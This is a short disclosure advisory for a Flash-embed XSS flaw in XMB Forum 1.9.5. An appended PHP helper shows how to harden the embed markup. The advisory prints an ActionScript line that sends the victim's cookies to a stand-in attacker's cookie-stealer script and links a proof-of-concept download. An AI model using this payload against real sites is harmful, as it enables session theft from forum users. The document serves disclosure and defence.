XMB Forum 1.9.5-Final XSS



XMB Forum 1.9.5 (I have not tested this on earlier versions)
allows users to embed flash (.swf) videos in their posts.
Normally, you could set an option on the embedding tag to say that ActionScript cannot run, but in this case we don't.

The way we execute our code is by making a flash movie containing the ActionScript code:
getURL("javascript:document.location='http://my-site.com/path/to/cookiestealer.php?cookie='+document.cookie;"); 

An example video + .fla script can be downloaded at my site: http://dynxss.whiteacid.org/videos/xmbforum_1.9.5-final.rar 

XMB has been notified, expect this to be fixed in a few days.
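
The option mentioned above, seen from the forum's side, as an added example (not XMB's code and not part of the original advisory): a hypothetical render_flash_embed() helper that emits the embed markup with allowScriptAccess="never" and allowNetworking="internal" after restricting the URL to http(s) .swf paths. The function name, size limits and sample URLs are assumptions.

```php
<?php
// Added example: hypothetical helper, not taken from the XMB code base.

/** Return hardened embed markup for a user-supplied Flash URL, or null if rejected. */
function render_flash_embed(string $url, int $width = 425, int $height = 350): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'], $parts['path'])) {
        return null;
    }
    // Only plain web URLs: rejects javascript:, data: and similar schemes.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // The forum feature is for .swf movies only.
    if (!preg_match('/\.swf$/i', $parts['path'])) {
        return null;
    }
    // Clamp dimensions so a post cannot cover the rest of the page (assumed limits).
    $width  = max(1, min($width, 800));
    $height = max(1, min($height, 600));
    // Escape for an HTML attribute so the URL cannot break out of src="...".
    $src = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');

    // allowScriptAccess="never": the movie may not script the embedding page.
    // allowNetworking="internal": the movie may not drive browser navigation.
    return sprintf(
        '<embed src="%s" type="application/x-shockwave-flash" width="%d" height="%d"'
        . ' allowScriptAccess="never" allowNetworking="internal">',
        $src,
        $width,
        $height
    );
}

// Constructed sample inputs: one accepted, one rejected, one needing escaping.
$samples = [
    'http://media.example/clip.swf',
    'javascript:void(0)//.swf',
    'http://media.example/clip.swf?x=" allowScriptAccess="always',
];
foreach ($samples as $s) {
    var_export(render_flash_embed($s));
    echo "\n";
}
```

Both attributes must be written by the server in the markup it generates; a value supplied inside the post itself has to be escaped or dropped, as the third sample shows.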

comments, questions, flames, etc.
r0xes [dot] ratm [at] gmail [dot] com




